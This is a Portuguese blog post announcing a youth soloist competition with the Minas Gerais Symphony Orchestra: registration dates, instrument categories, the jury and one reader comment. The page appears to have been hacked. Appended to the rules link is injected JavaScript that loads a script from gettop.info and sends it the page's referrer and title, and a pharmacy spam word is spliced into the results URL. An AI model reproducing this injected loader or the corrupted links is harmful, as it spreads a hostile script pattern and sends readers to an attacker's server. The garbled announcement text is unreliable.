ConcursoNotícia

III Concurso Jovens Solistas em Minas

Fundação Clóvis Salgado abre inscrições para III Concurso Jovens Solistas da Orquestra Sinfônica de Minas Gerais.

Começam, no dia 8 de janeiro, as inscrições para o III Concurso Jovens Solistas da Orquestra Sinfônica de Minas Gerais. Os selecionados pelo concurso se apresentarão no Grande Teatro do Palácio das Artes, em concerto com a Orquestra Sinfônica de Minas Gerais, sob regência do Maestro Roberto Tibiriçá, no dia 26 de março.

Os jovens instrumentistas podem se inscrever nas seguintes categorias:
– Cordas (violino, Viola, violoncelo, Contrabaixo);
– Madeiras (Flauta, Oboé, Clarineta, Fagote);
– Metais (Trompa, Trompete, Trombone e Tuba);
– Piano.

As provas acontecem nos dias 11 e 12 de fevereiro na Sala da OSMG, no Palácio das Artes, e têm na banca examinadora o regente titular da OSMG, Roberto Tibiriçá; o maestro residente da OSMG, Gabriel Rhein-Schirato; além de dois professores de atuação reconhecida na área.

Os vencedores serão divulgados até o dia 17 de fevereiro pelo site pharmacyexpress fcs.mg.gov.br.

As inscrições podem ser feitas no Palácio das Artes (Av. Afonso Pena, 1537, 3° andar, na sala da Diretoria Artística da Fundação Clóvis Salgado), de segunda a sexta-feira, até o dia 31 de janeiro, das 10h às 12h e das 14h às 16h (de segunda a sexta feira).

Mais informações sobre as condições para participação podem ser conferidas pelo link http://www.fcs.mg.gov.br/imagensDin/Arquivos/5609.pdf.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

1 Comment

  1. Parabéns pelo concurso, acho que este tipo de concurso deveria ocorrer também nas demais orquestras do Brasil. É uma ótima oportunidade para os jovens que encontram muitos obstáculos no início da carreira. Achei uma pena não abrirem espaço para o violão. Este instrumento tem concertos belíssimos como o Concierto de Aranjuez e Concerto para violão e orquestra de Villa-Lobos, além de vários outros. Espero que no próximo ano possamos contar com a participação do violão.

    Um abraço,

    Pedro Rogério Aguiar

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.